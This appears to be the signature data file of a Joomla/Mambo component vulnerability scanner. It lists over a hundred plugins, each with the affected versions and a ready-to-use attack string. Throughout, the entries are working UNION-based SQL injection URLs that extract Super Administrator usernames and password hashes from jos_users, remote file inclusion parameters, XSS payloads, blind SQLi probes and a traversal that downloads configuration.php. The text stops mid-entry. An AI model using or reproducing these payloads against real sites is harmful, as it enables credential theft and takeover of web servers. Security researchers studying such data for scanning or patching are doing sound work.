2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,concat(0x1e,username,0x3a,password,0x1e,0x3a ,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261 746f72-Component: joovideo SQL Injection Vulnerability Versions Affected: 1.2.2 < = |/components/com_joovideo/|/index.php?option=com_joovideo&Itemid=1&task=detail &id=-99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,con cat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+us ertype=0x53757065722041646d696e6973747261746f72-Component: Acajoom SQL Injection Vulnerability Versions Affected: 1.1.5 <= |/c omponents/com_acajoom/|/index.php?option=com_acajoom&act=mailing&task=view&listi d=1&Itemid=1&mailingid=1+UNION+SELECT+1,1,1,1,concat(0x1e,username,0x3a,password ,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+FROM+jos_users+where+u sertype=0x53757065722041646d696e6973747261746f72+LIMIT+1,1-Component: jReviews RFI Vulnerability Versions Affected: Any |/components/com_jr eviews/scripts/xajax.inc.php|/components/com_jreviews/scripts/xajax.inc.php?mosC onfig_absolute_path= Component: BSQ Site Stats XSS + SQL Injection Vulnerabilities Versions Aff ected: 1.8.0 <= |/components/com_bsq_sitestats/|1) Input passed via the "HTTP Re ferer" Header is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in an administrativ e user's browser session in context of an affected site when the site statistics are viewed. 2) Input passed via the URI string is not properly sanitised befor e being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation requires that "magic_quot es_gpc" is disabled. Component: Madeira RFI Vulnerability Versions Affected: Any|/components/com_mad eira/img.php|/components/com_madeira/img.php?url= Component: Mambo eMail Publisher File Inclusion Vulnerability Versions Affected: 1.2 <= |/components/com_mmp/help.mmp.php|/components/com_mmp/help.mmp .php?mosConfig_absolute_path= Component: Extended Registration File Inclusion Vulnerability Versions

    Affected: 4.1<= |/components/com_extended_registration/registration_detailed.in c.php|/components/com_extended_registration/registration_detailed.inc.php?mosCon fig_absolute_path= Component: OpenSEF(2.0.0 RC5 Unpatched <=), joomSEF(2.2.1<=), sh404SEF Versions Affected: 1.2.4 w <= |/components/com_sef/|N/A Component: Multibanners File Inclusion Vulnerability Versions Affected: Any|/co mponents/com_multibanners/extadminmenus.class.php|/components/com_multibanners/e xtadminmenus.class.php?mosConfig_absolute_path= Component: MoSpray File Inclusion Vulnerability Versions Affected: 1.8 R C1 <= |/components/com_mospray/scripts/admin.php|/components/com_mospray/scripts /admin.php?basedir= Component: MosMedia File Inclusion Vulnerability Versions Affected: 1.0.8 <= |/components/com_mosmedia/|/components/com_mosmedia/media.tab.php?mosConfig_ absolute_path= Component: Mos Tree File Inclusion Vulnerability Versions Affected: 1.58 <= |/components/com_mtree/|/components/com_mtree/Savant2/Savant2_Plugin_textarea.ph p?mosConfig_absolute_path= Component: Mambo Gallery Manager(com_mgm) File Inclusion Vulnerability Versions Affected: Any|/components/com_mgm/|/components/com_mgm/help.mgm.php?mosConfig_a bsolute_path= Component: MambelFish RFI Vulnerability Versions Affected: 1.x <= |/components/c om_mambelfish/|/components/com_mambelfish/mambelfish.class.php?mosConfig_absolut e_path= Component: LMO File Inclusion Vulnerability Versions Affected: 1.0b2 <= |/compon ents/com_lmo/|/components/com_lmo/lmo.php?mosConfig_absolute_path= Component: Link Directory File Inclusion Vulnerability Versions Affec ted: Any|/components/com_linkdirectory/|/components/com_linkdirectory/toolbar.li nkdirectory.html.php?mosConfig_absolute_path= Component: Letterman Versions Affected: 1.2.4 <= |/components/mod_letterman/|N/A Component: JIM File Inclusion Vulnerability Versions Affected: 1.0.1 <= |/compo nents/com_jim/|/components/com_jim/install.jim.php?mosConfig_absolute_path= Component: JD-Wiki File Inclusion Vulnerability Versions Affected: Any|/componen ts/com_jd-wiki/|/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absol ute_path= Component: Joomla Visites Remote File Inclusion Vulnerability Versions Affected: 1.1 RC2 <= |/components/com_joomla-visites/|/components/com_joomla-vis ites/core/include/myMailer.class.php?mosConfig_absolute_path= Component: JPad SQL Injection Vulnerability Versions Affected: 1.0<= |/compon ents/com_jpad/|/index.php?option=com_jpad&task=edit&Itemid=39&cid=-1+UNION+ALL+S ELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8+ FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: Filiale Versions SQL Injection Vulnerability Affected: 1.0.4 <= |/c omponents/com_filiale/|/index.php?option=com_filiale&idFiliale=-5+UNION+SELECT+1 ,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9,10,11 +FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: Pony Gallery SQL Injection Vulnerability Versions Affected: 1.5 < = |/components/com_ponygallery/|/index.php?option=com_ponygallery&Itemid=x&func= viewcategory&catid=+UNION+SELECT+1,2,3,4,0,concat(0x1e,username,0x3a,password,0x 1e,0x3a,usertype,0x1e),5,0,0+FROM+jos_users+where+usertype=0x53757065722041646d6 96e6973747261746f72-Component: Joomla Radio 5 File Inclusion Vulnerability Versions Affecte d: 5.0 <= |/components/com_joomlaradiov5/|/components/com_joomlaradiov5/admin.jo omlaradiov5.php?mosConfig_live_site= Component: Flash Slide Show Gallery File Inclusion Vulnerability Version s Affected: 1.0 <= |/components/com_slideshow/|/components/com_slideshow/admin.s lideshow1.php?mosConfig_live_site= Component: zOOm Media Gallery File Inclusion Vulnerability Versions Affecte d: 2.5.1 RC4 <= |/components/com_zoom/classes/|/components/com_zoom/classes/data base.php?mosConfig_absolute_path= Component: VirtueMart (Joomla! E-Commerce) Multiple XSS Vulnerabilities

    Versions Affected: 1.0.11 <= |/components/com_virtuemart/|/index.php?option=com_ contact&Itemid=1"><script>alert(1)</script> Component: User Home Pages 2 File Inclusion Vulnerability Versions Affected: 1.1.1 <= |/components/com_uhp2/|/components/com_uhp2/uhp_config.php?mosConfig_ab solute_path= Component: User Home Pages 1 File Inclusion Vulnerability Versions Affecte d: 1.1.1 <= |/components/com_uhp/|/components/com_uhp/uhp_config.php?mosConfig_a bsolute_path= Component: TaskHopper File Inclusion Vulnerability Versions Affecte d: 1.1<= |/components/com_thopper/|/components/com_thopper/inc/contact_type.php? mosConfig_absolute_path= Component: Security Images File Inclusion Vulnerability Versions Affected: 3.0. 5 <= |/components/com_securityimages/|/components/com_securityimages/lang.php?mo sConfig_absolute_path= Component: com_utchat File Inclusion Vulnerability Vulnerability Versions Affect ed: 0.2<= |/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php|/components/c om_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file= Component: SimpleBoard Script Insertion File Inclusion Vulnerability Versions Affected: Any|/components/com_simpleboard/|/components/com_simpleboard/file_upl oad.php?sbp= Component: SMF Bridge File Inclusion Vulnerability Versions Affected: 1.1.4 OpenSEF(2.0.0 RC5 Unpatched <=), joomSEF(2.2.1<=), sh404SEF Versions Affected: 1.2.4 w <= |/components/com_smf/|/components/com_smf/smf.php?mosConfig_absolute_ path= Component: RWCards SQL Injection Vulnerability Versions Affected: 2.4.4 OpenS EF(2.0.0 RC5 Unpatched <=), joomSEF(2.2.1<=), sh404SEF Versions Affected: 1.2.4 w <= |/components/com_rwcards/|/index.php?option=com_rwcards&task=listCards&cate gory_id=-1'UNION+SELECT+1,2,03,4,concat(0x1e,username,0x3a,password,0x1e,0x3a,us ertype,0x1e),50,044,076,0678,07+FROM+jos_users+where+usertype=0x5375706572204164 6d696e6973747261746f72-Component: RS Gallery2 SQL Injection Vulnerability Versions Affected: 1.11. 3<= |/components/com_rsgallery2/|/index.php?option=com_rsgallery2&page=inline&ca tid=-1+UNION+SELECT+1,2,3,4,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertyp e,0x1e),6,7,8,9,10,11+FROM+jos_users+where+usertype=0x53757065722041646d696e6973 747261746f72-Component: PollXT File Inclusion Vulnerability Versions Affected: 1.22.07<= |/co mponents/com_pollxt/|/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_p ath= Component: People Book File Inclusion Vulnerability Versions Affected: 1.1.5 <= |/components/com_peoplebook/param.peoplebook.php|/components/com_peoplebook/ param.peplebook.php?mosConfig_absolute_path= Component: Phil-A-Form SQL Injection Vulnerability Versions Affected: 1.2.0.0 <= |/components/com_philaform/|/index.php?option=com_philaform&form_id=-1+UNION+SE LECT+null,null,username,null,null,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x 1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: Per Forms File Inclusion Vulnerability Versions Affected: v1_beta <= |/components/com_performs/|/components/com_performs/performs.php?mosConfig_absol ute_path= Component: Webmaster Tips Portfolio File Inclusion Vulnerability Versions A ffected: 1.0 <= |/components/com_wmtportfolio/|/administrator/components/com_wmt portfolio/admin.wmtportfolio.php?mosConfig_absolute_path= Component: WmT Advanced Flash Gallery File Inclusion Vulnerability Versions Affected: 1.0 <= |/components/com_wmtgallery/|/components/com_wmtgallery/admin. wmtgallery.php?mosConfig_live_site= Component: Flash Panoramic View File Inclusion Vulnerability Versions Affe cted: 1.0 <= |/components/com_panoramic/|/components/com_panoramic/admin.panoram ic.php?mosConfig_live_site= Component: MamboXChange VideoDB File Inclusion Vulnerability Versions Affecte

    d: 0.3en <= |/components/com_videodb/core/videodb.class.xml.php|/components/com_ videodb/core/videodb.class.xml.php?mosConfig_absolute_path= Component: HTMLArea3 addon - ImageManager File Inclusion Vulnerability Versions Affected: 1.5 <= |/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc .php|/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfi g_absolute_path= Component: Calendar Versions Affected: 1.5.7 <= |/components/com_calendar/|N/A Component: NFN Address Book Versions Affected: 0.4 <= |/components/com_nfn_addre ssbook/|N/A Component: X-Shop RFI Vulnerability Versions Affected: 1.7 <= |/components/com_x -shop/|/components/com_x-shop/admin.x-shop?mosConfig_absolute_path= Component: Tour de France Pool Versions Affected: 1.0.1 <= |/components/com_tour _toto/|N/A Component: SWmenu File Inclusion Vulnerability Versions Affected: 4.0 <= |/components/com_swmenupro/|/administrator/components/com_swmenupro/ImageMana ger/Classes/ImageManager.php?mosConfig_absolute_path= Component: Nice Talk SQL Injection Vulnerability Versions Affected: 0.9. 3 <= |/components/com_nicetalk/|/index.php?option=com_nicetalk&tagid=-2)+UNION+S ELECT+1,2,3,4,5,6,7,8,0,999,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertyp e,0x1e),777,666,555,444,333,222,111+FROM+jos_users+where+usertype=0x537570657220 41646d696e6973747261746f72-Component: BibTeX Blind SQL Injection Vulnerability Versions Affected: 1.3 <= |/ components/com_jombib/|N/A Component: RSfiles Remote File Download Vulnerability Versions Affected: 1.0.2 < = |/components/com_rsfiles/|/index.php?option=com_rsfiles&task=files.download&pa th=...index.php Component: J! Reactions RFI Vulnerability Versions Affected: 1.8.1 <= |/componen ts/com_jreactions/|/components/com_jreactions/langset.php?comPath= Component: mosListMessenger Versions Affected: 2.1.0 <= |/components/com_lm/|N/A Component: Webring File Inclusion Vulnerability Versions Affected: 1.0<= | /components/com_webring/|/components/com_webring/admin.webring.docs.php?componen t_dir= Component: Joomla! 12Pictures File Inclusion Vulnerability Versions Affecte d: 1.0<= |/components/com_joom12pic/|/components/com_joom12pic/admin.joom12pic.p hp?mosConfig_live_site= Component: FlashFun SQL Injection Vulnerability Versions Affected: 1.0 <= |/comp onents/com_flashfun/|/index.php?option=com_flash&act=view&Itemid=37&id=-13+union +select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from +jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: NeoRecruit SQL Injection Vulnerability Versions effected: 1.4. 0 and older|/components/com_neorecruit/|/index.php?option=com_neorecruit&task=of fer_view&id=option=com_neorecruit&task=offer_view&id=99999999999+UNION+SELECT+1, concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,111,222, 333,444,0,0,0,555,666,777,888,1,2,3,4,5,0+FROM+jos_users+where+usertype=0x537570 65722041646d696e6973747261746f72-Component: MosReporter File Inclusion Vulnerability Versions effected: 0.9. 3 and older|/components/com_reporter/processor/reporter.sql.php|/components/com_ reporter/processor/reporter.sql.php?mosConfig_absolute_path= Component: Joomla Flash Fun! File Inclusion Vulnerability Versions effec ted: 1.0 and older|/components/com_joomlaflashfun/|/components/com_joomlaflashfu n/admin.joomlaflashfun.php?mosConfig_live_site= Component: mosDirectory SQL Injection Vulnerability Versions effected: 2.3.2 and older|/components/com_directory/|/index.php?option=com_directory&page=viewc at&catid=-1+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype ,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: PU Arcade SQL Injection Vulnerability Versions effected: 2.1 .3 Beta and older|/components/com_puarcade/|/index.php?option=com_puarcade&Itemi d=92&fid=-1+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0 x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: RSGallery SQL Injection Vulnerability Versions effected: 2.0 b

    eta 5 and older|/components/com_rsgallery/|/index.php?option=com_rsgallery&page= inline&catid=-1+UNION+SELECT+1,2,3,4,concat(0x1e,username,0x3a,password,0x1e,0x3 a,usertype,0x1e),6,7,8,9,10,11+FROM+jos_users+where+usertype=0x53757065722041646 d696e6973747261746f72-Component: JUser File Inclusion Vulnerability Versions effected: 1.0.14 a nd older|/components/com_juser/|/components/com_juser/xajax_functions.php?mosCon fig_absolute_path= Component: Carousel Flash Image Gallery File Inclusion Vulnerability Versi ons effected: 1.0 and older|/components/com_jjgallery/|/components/com_jjgallery /admin.jjgallery.php?mosConfig_absolute_path= Component: Color Lab File Inclusion Vulnerability Versions effected: 1.0 an d older|/components/com_colorlab/|/components/com_color/admin.color.php?mosConfi g_live_site= Component: Joomla Flash Uploader File Inclusion Vulnerability Versions effe cted: 2.5.2 and older|/components/com_joomla_flash_uploader/|/components/com_joo mla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path= Component: JContentSubscription File Inclusion Vulnerability Versions effec ted: 1.5.8 and older|/components/com_jcs/|/components/com_jcs/jcs.function.php?m osConfig_absolute_path= Component: Mp3 Allopass File Inclusion Vulnerability Versions effected: 1.0 and older|/components/com_mp3_allopass/|/components/com_mp3_allopass/allopass-er ror.php?mosConfig_live_site= Component: (xsstream-dm) SQL Injection Vulnerability Versions Affected: N/A|/com ponents/com_xsstream-dm/|/index.php?option=com_xsstream-dm&Itemid=69&movie=-1/** /union/**/select/**/1,2,admin,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 /**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: (biblestudy) SQL Injection Vulnerability Version Affected: N/A|/compo nents/com_biblestudy/|/index.php?option=com_biblestudy&view=mediaplayer&id=-1+UN ION+SELECT+1,2,3,4,5,6,7,8,9,10,11,13,14,15,16,17,18,19,20,concat(0x1e,username, 0x3a,password,0x1e,0x3a,usertype,0x1e),22,23,24,25,26,27,28,29,30,31,32,33,34,35 ,36,37,38,39,40+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261 746f72-Component: com_fq SQL Injection Vulnerability Versions effected: N/A|/component s/com_fq/|/index.php?option=com_fq&Itemid=999&listid=999/**/union/**/select/**/0 ,concat (username,0x3a,password)/**/from/**/jos_users+where+usertype=0x537570657 22041646d696e6973747261746f72/* Component: com_football (teamID) SQL Injection Vulnerability Versions effected: N/A|/components/com_football/|/index.php?option=com_football&task=viewteam&team ID=-1+union+select+null,null,3,4,5,6,concat (username,0x3a,password),8+from+jos_ users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: jabode SQL injection Vulnerability Version Affected: N/A|/components/ com_jabode/|/index.php?option=com_jabode&task=sign&sign=taurus&id=-2+UNION+SELEC T+1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_u sers+where+usertype=0x53757065722041646d696e6973747261746f72-Component: netinvoice SQL injection Vulnerability Version Affected: N/A|/compone nts/com_netinvoice/|/index.php?option=com_netinvoice&action=orders&task=order&ci d=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47,48 FROM jos_users+where+usertype=0x53757065722041646d696e6973 747261746f72-Component: beamospetition SQL injection Vulnerability variant 1 Version Affected : N/A|/components/com_beamospetition/|/index.php?option=com_beamospetition&pet=5+UNION+SELECT+1,1,1,1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,userty pe,0x1e),1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e697 3747261746f72-Component: prayercenter SQL injection Vulnerability Version Affected: N/A|/comp onents/com_prayercenter/|/index2.php?option=com_prayercenter&task=view_request&i d=-1+UNION+SELECT+1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e ),1,1,1,1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973 747261746f72--

    Component: com_webhosting Blind SQL Injection Vulnerability Version Affected: N/A|/components/com_webhosting/|/index.php?option=com_webhosting&catid=1+and+1=1 ::/index.php?option=com_webhosting&catid=1+and+1=2 Component: com_datsogallery Blind SQL Injection Vulnerability Version Affected : 1.6 or lower|/components/com_datsogallery/|Fill useragent string with 15754'), (1,if(ascii(substring((select password from #__users where username='admin'),0,1 ))>58,(select 'Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.8.1.14) Gecko/2 0080404 Firefox/2.0.0.14'),(select link from #__menu)))/* Component: com_artist SQL injection Vulnerability Version Affected: N/A|/compon ents/com_artist/|/index.php?option=com_artist&idgalery=-1+UNION+SELECT+1,2,3,con cat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8,9+FROM+jos_user s+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_mycontent Blind SQL Injection Vulnerability Version Affected: N/A |/components/com_mycontent/|/index.php?option=com_mycontent&task=view&id=1+and+1 =1::/index.php?option=com_mycontent&task=view&id=1+and+1=2 Component: Joo!BB Blind SQL Injection Vulnerability Version Affected: 0.5.9 or lower|/components/com_joobb/|/index.php?option=com_joobb&view=forum&forum=1+and+ 1=1::/index.php?option=com_joobb&view=forum&forum=1+and+1=2 Component: acctexp Blind SQL Injection Vulnerability Version Affected: <= 0.1 2|/components/com_acctexp/|/index.php?option=com_acctexp&task=subscribe&usage=1+ and+1=1::/index.php?option=com_acctexp&task=subscribe&usage=1+and+1=2 Component: joomradio SQL Injection Vulnerability Version Affected: <= 1.0 |/com ponents/com_joomradio/|/index.php?option=com_joomradio&page=show_video&id=-1+UNI ON+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1, 1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_equotes SQL injection Vulnerability Version Affected: 0.95 <= |/components/com_equotes/|/index.php?option=com_equotes&id=13+and+1=1+UNION+SEL ECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1+FROM +jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_idoblog SQL Injection Vulnerability Version Affected: b24<= |/com ponents/com_idoblog/|/index.php?option=com_idoblog&task=userblog&userid=42+and+1 =1+UNION+SELECT+1,1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype, 0x1e),1,1,1,1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e 6973747261746f72-Component: JooBlog Blind SQL Injection Vulnerability Version Affected: 0.1.1<= |/components/com_jb2/|/index.php?option=com_jb2&view=category&CategoryID=1+and+ 1=1::/index.php?option=com_jb2&view=category&CategoryID=1+and+1=2 Component: jotloader Blind SQL Injection Vulnerability Version Affected: 1.2.1. a<= |/components/com_jotloader/|/index.php?option=com_jotloader&cid=1+and+1=1::/ index.php?option=com_jotloader&cid=1+and+1=2 Component: EasyBook SQL Injection Vulnerability Version Affected: 1.1<= |/compon ents/com_easybook/|/index.php?option=com_easybook&Itemid=1&func=deleteentry&gbid =-1+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e) ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+jos_users+where+usertype=0x53757 065722041646d696e6973747261746f72-Component: joomladate SQL injection Vulnerability Version Affected: N/A|/comp onents/com_joomladate/ |/index.php?option=com_joomladate&task=viewProfile&user=9 999999+UNION+SELECT+1,1,1,1,1,1,1,1,1,1,1,1,1,concat(0x1e,username,0x3a,password ,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065 722041646d696e6973747261746f72-Component: GameQ SQL Injection Vulnerability Version Affected: 4.0<= |/component s/com_game/|/index.php?option=com_gameq&task=page&category_id=-1+UNION+SELECT+1, 2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8,9,10,11, 12,13,14+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72Component: n-forms Blind SQL Injection Vulnerability Version Affected: 1.01 <= |/components/com_n-forms/|/index.php?option=com_n-forms&form_id=1+and+1=1::/inde x.php?option=com_n-forms&form_id=1+and+1=2 Component: yvcomment Blind SQL Injection Vulnerability Version Affected: 1.16 <= |/components/com_yvcomment/|/index.php?option=com_yvcomment&view=comment&Arti

    cleID=1+and+1=1::/index.php?option=com_yvcomment&view=comment&ArticleID=1+and+1= 2 Component: News Portal Blind SQL Injection Vulnerability Version Affected: 1.0 <= |/components/com_news_portal/|/index.php?option=com_news_portal&Itemid=1+and +1=1::/index.php?option=com_news_portal&Itemid=1+and+1=2 Component: expshop SQL injection Vulnerability Version Affected: N/A|/componen ts/com_expshop/|/index.php?option=com_expshop&page=show_payment&catid=-2+UNION+S ELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_u sers+where+usertype=0x53757065722041646d696e6973747261746f72-Component: Xe webtv Blind SQL Injection Vulnerability Version Affected: N/A|/c omponents/com_xewebtv/|/index.php?option=com_xewebtv&Itemid=60&func=detail&id=1+ and+1=1::/index.php?option=com_xewebtv&Itemid=60&func=detail&id=1+and+1=2 Component: com_versioning (id) SQL Injection Vulnerability Version Affected: 1.0.2<= |/components/com_versioning /|/index.php?option=com_versioning&task=ed it&id=-83+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0 x1e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 F ROM jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: mygallery SQL Injection Vulnerability Version Affected: N/A|/compon ents/com_mygallery/|/index.php?option=com_mygallery&func=viewcategory&cid=-1+UNI ON+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6, 7,8,9,10,11,12+FROM+jos_users+where+usertype=0x53757065722041646d696e69737472617 46f72-Component: Brightcode Weblinks SQL Injection Vulnerability Version Affected: N/ A|/component/com__brightweblinks/|/index.php?option=com_brightweblinks&Itemid=58 &catid=1 UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13 ,14,15,16 FROM jos_users WHERE usertype=0x53757065722041646d696e6973747261746f72 -Component: QuickTime VR SQL Injection Vulnerability Version Affected: 1.0 <= |/components/com_vr/|/index.php?option=com_vr&Itemid=78&task=viewer&room_id=-1+ UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2+FROM+ jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: is_com Multiple SQL Injection Vulnerability Version Affected: 1.0.1 <= |/components/com_is/|/index.php?option=com_is&task=motor&motor=-1+UNION+S ELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8, 9,10,11,12,13+FROM+jos_users+where+usertype=0x53757065722041646d696e697374726174 6f72-Component: altas multiple SQL Injection Vulnerability Version Affected: 1.0 <= |/components/com_altas/|/index.php?option=com_altas&mes=-1%20union%20select% 201,2,password,4,5,6,7,8/**/from/**/jos_users+where+usertype=0x53757065722041646 d696e6973747261746f72-Component: com_dbquery RFI Vulnerability Version Affected: 1.4.1.1 <= |/comp onents/com_dbquery/|/components/com_dbquery/classes/DBQ/admin/common.class.php?m osConfig_absolute_path= Component: ionFiles com_ionfiles Arbitrary File Download Vulnerability Versi on Affected: 4.4.2 <= |/components/com_ionfiles/|/components/com_ionfiles/ download.php?file=../../configuration.php&download=1 Component: DT SQL Injection Vulnerability Version Affected: N/A|/components/ com_dtregister/|/index.php?option=com_dtregister&eventId=-12+UNION+SELECT+concat (0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usert ype=0x53757065722041646d696e6973747261746f72&task=pay_options&Itemid=138 Component: com_ezstore Blind SQL Injection Vulnerability Version Affected: N /A|/components/com_ezstore/|/index.php?option=com_ezstore&Itemid=1&func=detail&i d=1+and+1=1::/index.php?option=com_ezstore&Itemid=1&func=detail&id=1+and+1=2 Component: com_na_qforms (QF_msg) Cross Site Scripting (XSS) Vulnerability Ver sion Affected: N/A|/components/com_na_qforms/|/index.php?option=com_na_qforms&QF _url=error&QF_msg=%3E%3Cscript%3Ealert(1)%3C/script%3E Component: Joomla Imagebrowser Directory Tranversal Vulnerability Version Affe cted: 0.1.5 RC2<= |/components/remository/|/index.php?option=com_imagebrowser &folder=../../../../_non_ Component: com_hotspots SQL Injection Vulnerability Version Affected: N/A|/co

    mponents/com_hotspots/|/index.php?Itemid=53&option=com_hotspots&task=w&w=5+and+1 =2+union+select+concat(username,0x3a,password)+from+jos_users+where+usertype=0x5 3757065722041646d696e6973747261746f72-Component: com_joomtracker SQL Injection Vulnerability Version Affected: 1.0 .1<= |/components/com_joomtracker/|/index.php?option=com_joomtracker&task=tordet ails&id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,conca t(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35/**/from/**/jos_users/* +where+usertype=0x53757065722041646d696e69737 47261746f72 Component: Ignite SQL Injection Vulnerability Version Affected: 0.8.3<= |/co mponents/com_ignitegallery/|/index.php?option=com_ignitegallery&task=view&galler y=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+ jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=18 Component: Mad4Joomla Mailforms SQL Injection Vulnerability Version Affected: N/A|/components/com_mad4joomla/|/index.php?option=com_mad4joomla&jid=-2+union+s elect+1,concat(username,char(58),password)KHG,3,4+from+jos_users+where+usertype= 0x53757065722041646d696e6973747261746f72-Component: Ownbiblio (com_ownbiblio) SQL Injection Vulnerability Version Affect ed: 1.5.3<= |/components/com_ownbiblio/|/index.php?option=com_ownbiblio&view=ca talogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5, 6,7,8,9,10,11,12,13,14,15,16+from+jos_users+where+usertype=0x53757065722041646d6 96e6973747261746f72-Component: Daily Message (com_dailymessage) SQL Injection Vulnerability Version Affected: 1.0.3<= |/components/com_dailymessage/|/index.php?option=com_dailym essage&Itemid=31&page=[PAGENAME]&id=-7+union+select+concat(username,char(58),pas sword)KHG,2,3+from+jos_users+where+usertype=0x53757065722041646d696e697374726174 6f72-Component: com_ds-syndicate SQL Injection Vulnerability Version Affected: N/A |/components/com_ds-syndicate/|Request /index.php?option=ds-syndicate&version=1& feed_id=1+union+all+select+1,concat(username,char(58),password,char(58),email),3 ,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users+where+usertype=0x537 57065722041646d696e6973747261746f72-- and If you get some file to download like feed or xml, download that file and open with some text editor to see informatio ns like username and password Component: com_thyme SQL Injection Vulnerability Version Affected: 1.0<= |/c omponents/com_thyme/|/index.php?option=com_thyme&calendar=1&category=1&d=1&m=1&y =2008&Itemid=1&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(username,0x3 a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+j os_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: Archaic Binary Gallery Directory Traversal Vulnerability Version Affe cted: 1.0<= |/components/com_ab_gallery/|/index.php?option=com_ab_gallery&Itemid =37&gallery=_NOT_EXIST Component: Kbase (com_kbase) SQL Injection Vulnerability Version Affected: 1.2<= |/components/com_kbase/|/index.php?option=com_kbase&view=article&id=-1+union+se lect+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: Flash Tree Gallery(com_treeg) Remote File Inclusion Vulnerability Ver sion Affected: 1.0<= |/administrator/components/com_treeg/|/administrator/compon 